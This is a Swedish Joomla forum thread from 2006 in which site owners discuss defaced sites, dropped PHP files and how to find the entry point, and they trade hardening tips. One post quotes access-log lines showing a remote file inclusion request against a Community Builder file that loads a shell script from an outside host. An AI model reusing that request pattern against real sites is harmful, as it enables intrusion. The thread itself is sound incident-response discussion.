The Joomla! Forum ™

Download

Demo


Board index » Joomla! International Language Support » International Zone » Swedish Forum » Äldre versioner » Forum Joomla! 1.0 » Installation, backup och säkerhet

Forum rules


Forumregler



Forum locked This topic is locked, you cannot edit posts or make further replies.  Page 1 of 1
  [ 21 posts ] 
  Print view Previous topic | Next topic 
Author Message
Florre
PostPosted: Wed Aug 09, 2006 10:22 pm 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Mon Dec 26, 2005 2:39 pm
Posts: 222
Location: Västerås, Sweden
Hej på er!

Nu i kväll har grillweb.se blicit hackad. >:( :'(

Trots att jag uppdaterat till 1.0.10 och jag tror jag gått igenom alla komponenter...  :-\ ??? :( >:(

Hur tar jag reda på vilken väg dom tagit sig in?

/Florre

_________________
http://www.grillweb.se - Allt om grillning! Massor med tips och ideér! Sveriges största sajt om grillning och Barbeque.
http://www.tidtagning.se - Tidtagning på simtävlingar!
Top
 Profile  
 
vendelberg
PostPosted: Thu Aug 10, 2006 7:37 am 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Sat Aug 20, 2005 6:56 pm
Posts: 1662
Location: Vendel/Örbyhus
Hej
Om du har en bra webbleverantör så kan de se var intrången sker. Så var det iallafall för mig. Jag fick ett snabbt mail om att jag borde se upp med xx komponenten för den var utsatt. Tack Morfagekko för den upplysningen!//Mia

_________________
Man lär så länge man har elever
* Glöm inte att markera ditt första inlägg i tråden som LÖST (den gröna bocken) när du anser att du fått tillräcklig hjälp! *

www.joomlaakuten.se
Top
 Profile  
 
svenl
PostPosted: Thu Aug 10, 2006 8:17 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Mon Oct 17, 2005 1:50 pm
Posts: 1032
Location: Närke, Sweden
Hejsan Florre,

Hur hade det gått till?
Om du har senaste versionen av joomla och uppdaterat alla komponenter så är det intressant att få reda på hur det gått till så att vi kan "stämma i bäcken".

Eller skedde intrånget på annat sätt??

mvh
8)

_________________
-
Sanningen finns där ute, har du sökt efter ditt svar?
var svaret bra och löste ditt problem? Glöm då inte att ändra ditt första inlägg till löst (Solved)
Top
 Profile  
 
Florre
PostPosted: Thu Aug 10, 2006 8:37 pm 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Mon Dec 26, 2005 2:39 pm
Posts: 222
Location: Västerås, Sweden
svenl wrote:
Hejsan Florre,

Hur hade det gått till?
Om du har senaste versionen av joomla och uppdaterat alla komponenter så är det intressant att få reda på hur det gått till så att vi kan "stämma i bäcken".

Eller skedde intrånget på annat sätt??

mvh
8)


Ja det skulle jag också vilja veta...
Svaret jag fått från Loopia är att det inte skett via FTP... Dom säger dessutom så här:

Quote:
Vad jag förstått så vimlar Joomla av säkerhetshål.
Men det finns antagligen bättre och bättre skydd också som släpps hela tiden.
Exakt vilka kryphål vet jag inte, däremot så finns dem, och dessvärre finns det personer som gillar att utnyttja dem.
Det enda jag kan råda till är att försöka täppa till dem som du vet om, och försöka uppdatera dig så gott du kan.


Med andra ord som jag sa i första inlägget: HUR tar jag reda på hur dom gjorde?

/Florre

_________________
http://www.grillweb.se - Allt om grillning! Massor med tips och ideér! Sveriges största sajt om grillning och Barbeque.
http://www.tidtagning.se - Tidtagning på simtävlingar!
Top
 Profile  
 
Florre
PostPosted: Thu Aug 10, 2006 8:40 pm 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Mon Dec 26, 2005 2:39 pm
Posts: 222
Location: Västerås, Sweden
Det som hände var i och för sig ganska lite...
Filerna index.htm och index.php var utbytta och dessutom hade dom lagt dit filen \images\stories\a.php som mitt antivirusprogram tog död på när jag laddade hem hela katalogen för kontroll.
/Florre

_________________
http://www.grillweb.se - Allt om grillning! Massor med tips och ideér! Sveriges största sajt om grillning och Barbeque.
http://www.tidtagning.se - Tidtagning på simtävlingar!
Top
 Profile  
 
vendelberg
PostPosted: Thu Aug 10, 2006 8:50 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Sat Aug 20, 2005 6:56 pm
Posts: 1662
Location: Vendel/Örbyhus
Hej
Nu måste jag också erkänna att jag blivit hackad Igen på samma site trots uppdateringar och koll från webhotellet.  :-[ Jag ska kolla igenom hela siten igen för att kolla om nåt gammalt finns kvar som inte blivit åtgärdat. Nu var det också index.php som blivit utbytt. Den här gången stod det Q8 på index sidan.

Florre, vad hände när du blev hackad. Alltså vad visade sig på första sidan?
Det verkar som det är andra aktörer i farten.

Jag läste på säkerhetssidorna lite mer ingående, ska läsa igen. http://forum.joomla.org/index.php/topic,54006.0.html

//Mia

_________________
Man lär så länge man har elever
* Glöm inte att markera ditt första inlägg i tråden som LÖST (den gröna bocken) när du anser att du fått tillräcklig hjälp! *

www.joomlaakuten.se
Top
 Profile  
 
svenl
PostPosted: Thu Aug 10, 2006 9:06 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Mon Oct 17, 2005 1:50 pm
Posts: 1032
Location: Närke, Sweden
Så det är nya problem ute?

Då gäller det att se upp och ändra behörigheterna på katalogerna

Följande tråd tar upp en del i förebyggande syfte
http://forum.joomla.org/index.php/topic,81058.0.html

Är man hackad så är Vendelbergs tråd den man bör läsa.

En bra tråd att lägga bevakning på (Notify) är följande
http://forum.joomla.org/index.php/topic,40046.0.html
då får man snabb info om säkerhetsproblem i joomlas "core-filer".

Gäller att ha koll på det internationella forumet ikväll tydligen.

mvh
8)


PS  det borde finnas en loggfil för domänen som ni kan få och gå igenom?

_________________
-
Sanningen finns där ute, har du sökt efter ditt svar?
var svaret bra och löste ditt problem? Glöm då inte att ändra ditt första inlägg till löst (Solved)
Top
 Profile  
 
Florre
PostPosted: Thu Aug 10, 2006 9:15 pm 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Mon Dec 26, 2005 2:39 pm
Posts: 222
Location: Västerås, Sweden
vendelberg wrote:
Hej

Florre, vad hände när du blev hackad. Alltså vad visade sig på första sidan?
Det verkar som det är andra aktörer i farten.

//Mia


Det synbara var:
Quote:
Freedom For Ocalan
Apocu cizgi zafer yürüyüsünün adidir.


/Florre

_________________
http://www.grillweb.se - Allt om grillning! Massor med tips och ideér! Sveriges största sajt om grillning och Barbeque.
http://www.tidtagning.se - Tidtagning på simtävlingar!
Top
 Profile  
 
svenl
PostPosted: Thu Aug 10, 2006 9:25 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Mon Oct 17, 2005 1:50 pm
Posts: 1032
Location: Närke, Sweden
Kolla denna sträng
http://forum.joomla.org/index.php/topic,79477.0.html

Det finns en hel del som tillkommit idag, bland annat för Community Builder  :- :'( :'( :'(

mvh
:-\

_________________
-
Sanningen finns där ute, har du sökt efter ditt svar?
var svaret bra och löste ditt problem? Glöm då inte att ändra ditt första inlägg till löst (Solved)
Top
 Profile  
 
vendelberg
PostPosted: Thu Aug 10, 2006 9:26 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Sat Aug 20, 2005 6:56 pm
Posts: 1662
Location: Vendel/Örbyhus
Hej
Trodde jag postat ett nytt inlägg men det lyckades försvinna ibland alla mina öppna fönster. Jag har iallafall tagit en RAW access log från min Cpanel och funnit att den har antagligen hackats från nån annan sida. Fattar inte så mycket men jag TROR att jag kan utläsa loggen. Bifogar 2 av alla rader som stod. (det var 861 sidor)

168.187.166.34 - - [10/Aug/2006:04:05:14 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.terradibari.it/chat/.jr7/r57.txt? HTTP/1.1" 200 39160 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
168.187.166.34 - - [10/Aug/2006:04:05:16 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?img=1 HTTP/1.1" 200 533 "http://www.tirk.org/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.terradibari.it/chat/.jr7/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Den här terraibari.t/chat är oxå hackad.

Är det då månne com_comprofiler/plugin.class.php som är utsatt. Det ska jag kolla nu.
//Mia

Edit: Nu var du snabb Svenl. Men jag fick ju iallafall svar på min fråga hehe. Tack för upplysningen!

_________________
Man lär så länge man har elever
* Glöm inte att markera ditt första inlägg i tråden som LÖST (den gröna bocken) när du anser att du fått tillräcklig hjälp! *

www.joomlaakuten.se


Last edited by vendelberg on Thu Aug 10, 2006 9:28 pm, edited 1 time in total.

Top
 Profile  
 
jocke4u
PostPosted: Thu Aug 10, 2006 9:31 pm 
Joomla! Intern
Joomla! Intern
Offline

Joined: Tue Nov 01, 2005 6:54 am
Posts: 69
Location: Alingsås, Sweden
Ni som använder Community Builder bör kanske kolla in deras sida då jag fick ett mail idag att de har jobbat intensivt de senaste 48h med att täppa några riktiga "ful-hål"..... kolla http://joomlapolis.com/

_________________
BR
Joacim
Top
 Profile  
 
svenl
PostPosted: Thu Aug 10, 2006 9:56 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Mon Oct 17, 2005 1:50 pm
Posts: 1032
Location: Närke, Sweden
Då har jag uppdaterat min CB, frågan är diock hur statusen är för den svenska språkfilen?

Där fanns det ingen uppdatering (ännu).
Hoppas man nu kan sova inatt utan att se sidan hackad imorgon bitti.

mvh
8)

_________________
-
Sanningen finns där ute, har du sökt efter ditt svar?
var svaret bra och löste ditt problem? Glöm då inte att ändra ditt första inlägg till löst (Solved)
Top
 Profile  
 
jocke4u
PostPosted: Thu Aug 10, 2006 10:02 pm 
Joomla! Intern
Joomla! Intern
Offline

Joined: Tue Nov 01, 2005 6:54 am
Posts: 69
Location: Alingsås, Sweden
Tjenna Sven,

Har ingen aning men vill tipsa om Beyond Compare (http://scootersoftware.com/) som är väldigt bra och billig. Använder detta för alla uppdateringar eftersom man (jag) har gjort anpassningar och sen vill uppgradera. Att man sen sparar eget arbete i CVS/Subversion så har man bra koll på sakerna.

Jag använder Eclipse + PHPEclipse + Subversion + Beyond Compare .... plus runtime

_________________
BR
Joacim
Top
 Profile  
 
vendelberg
PostPosted: Thu Aug 10, 2006 10:20 pm 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Sat Aug 20, 2005 6:56 pm
Posts: 1662
Location: Vendel/Örbyhus
Hej
tänkte komplettera Joachims inlägg med ett annat program som jag brukar använda. Det är helt gratis och open Source, finns på svenska.
Den passar mina behov men jag ska kolla den som du rekommenderade ;)
Här är länken till Winmerge http://winmerge.org/

//Mia

_________________
Man lär så länge man har elever
* Glöm inte att markera ditt första inlägg i tråden som LÖST (den gröna bocken) när du anser att du fått tillräcklig hjälp! *

www.joomlaakuten.se
Top
 Profile  
 
Florre
PostPosted: Fri Aug 11, 2006 6:14 am 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Mon Dec 26, 2005 2:39 pm
Posts: 222
Location: Västerås, Sweden
Jag blir lite fundersam...

I alla texter om säkerhetsproblemen får jag intrycket att om "Register Globals:  OFF" så ska det inte vara någon risk att bli hackad.

Min ÄR satt till OFF... trots det fick jag sidan hackad...  >:(

/Florre

_________________
http://www.grillweb.se - Allt om grillning! Massor med tips och ideér! Sveriges största sajt om grillning och Barbeque.
http://www.tidtagning.se - Tidtagning på simtävlingar!
Top
 Profile  
 
jocke4u
PostPosted: Fri Aug 11, 2006 6:35 am 
Joomla! Intern
Joomla! Intern
Offline

Joined: Tue Nov 01, 2005 6:54 am
Posts: 69
Location: Alingsås, Sweden
Vill du ta bort risken att bli hackad så finns det bara en väg....

1. Ta ut nätverkskabeln
2. Stäng ner maskinen
3. Dra ut strömsladden

Sen kan man väl göra sajten mer eller mindre sårbar precis som du säger och det är rätt att sätta Register Globals till OFF. Men detta är ju bara ett steg emot ett säkrare system. Sen kan ju fortfarande komponenter, moduler,..etc skrivas på ett dåligt sätt och öppna vägar in i dina adminsidor etc.

Ett exempel är ju Joomla mjukvara som inte innehåller
Code:
defined( '_VALID_MOS' ) or die( 'Restricted access' );
och förhindrar direkt tillgång.

_________________
BR
Joacim
Top
 Profile  
 
novata
PostPosted: Fri Aug 11, 2006 6:38 am 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Thu Oct 20, 2005 2:50 pm
Posts: 1144
hej allihopa!

När blir ni hackade? tråkig att man blir hackad 2 gånger som det händ hos Mia.
Mia- titta på din häst sida och det ser ut som css har försvunnit någonstans
http://www.tirk.org/component/option,co ... temid,141/
Nu ska jag boota om min mac,några säkerhetspatchar har installerats.

Novata
Top
 Profile  
 
Florre
PostPosted: Fri Aug 11, 2006 6:40 am 
User avatar
Joomla! Enthusiast
Joomla! Enthusiast
Offline

Joined: Mon Dec 26, 2005 2:39 pm
Posts: 222
Location: Västerås, Sweden
Jocke, du har ju naturligtvis helt rätt..!
Men en fråga jag ställt tidigare och inte fått svar på (eller så har jag missat det):

Ska "defined( '_VALID_MOS' ) or die( 'Restricted access' );" finnas med i ALLA php-filer? Eller finns det filer som INTE ska ha den raden?

/Florre

_________________
http://www.grillweb.se - Allt om grillning! Massor med tips och ideér! Sveriges största sajt om grillning och Barbeque.
http://www.tidtagning.se - Tidtagning på simtävlingar!
Top
 Profile  
 
jocke4u
PostPosted: Fri Aug 11, 2006 6:46 am 
Joomla! Intern
Joomla! Intern
Offline

Joined: Tue Nov 01, 2005 6:54 am
Posts: 69
Location: Alingsås, Sweden
Florre wrote:
Jocke, du har ju naturligtvis helt rätt..!
Men en fråga jag ställt tidigare och inte fått svar på (eller så har jag missat det):

Ska "defined( '_VALID_MOS' ) or die( 'Restricted access' );" finnas med i ALLA php-filer? Eller finns det filer som INTE ska ha den raden?

/Florre

Man kan grovt säga att alla PHP filer skall ha detta utom templatens index.php då det inte skulle fungera :-) (ett snabbt antagande)
Finns garanterat dokumenterat någonstans men hittade det inte just nu..

_________________
BR
Joacim
Top
 Profile  
 
vendelberg
PostPosted: Fri Aug 11, 2006 7:50 am 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Sat Aug 20, 2005 6:56 pm
Posts: 1662
Location: Vendel/Örbyhus
novata wrote:
Mia- titta på din häst sida och det ser ut som css har försvunnit någonstans

Hej och mycket tack för att du är uppmärksam!
Det kan mycket väl ha hänt något i min iver att ta bort allt gammalt. Ska felsöka nu. (Som om man inte har annat att göra  :'()
//Mia

_________________
Man lär så länge man har elever
* Glöm inte att markera ditt första inlägg i tråden som LÖST (den gröna bocken) när du anser att du fått tillräcklig hjälp! *

www.joomlaakuten.se
Top
 Profile  
 
novata
PostPosted: Fri Aug 11, 2006 10:06 am 
User avatar
Joomla! Ace
Joomla! Ace
Offline

Joined: Thu Oct 20, 2005 2:50 pm
Posts: 1144
.det irriterar mig att folk förstår inte att det är ingen kul att hacka en sida, värför gör dem så? vill de hacka bra för dem hacka hela sajten även databas,det ser ut att det är bara newbies som håller på att förstöra för andra..
>:( >:( >:( >:(
Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  Page 1 of 1
  [ 21 posts ] 


Board index » Joomla! International Language Support » International Zone » Swedish Forum » Äldre versioner » Forum Joomla! 1.0 » Installation, backup och säkerhet

Who is online

Users browsing this forum: No registered users and 4 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group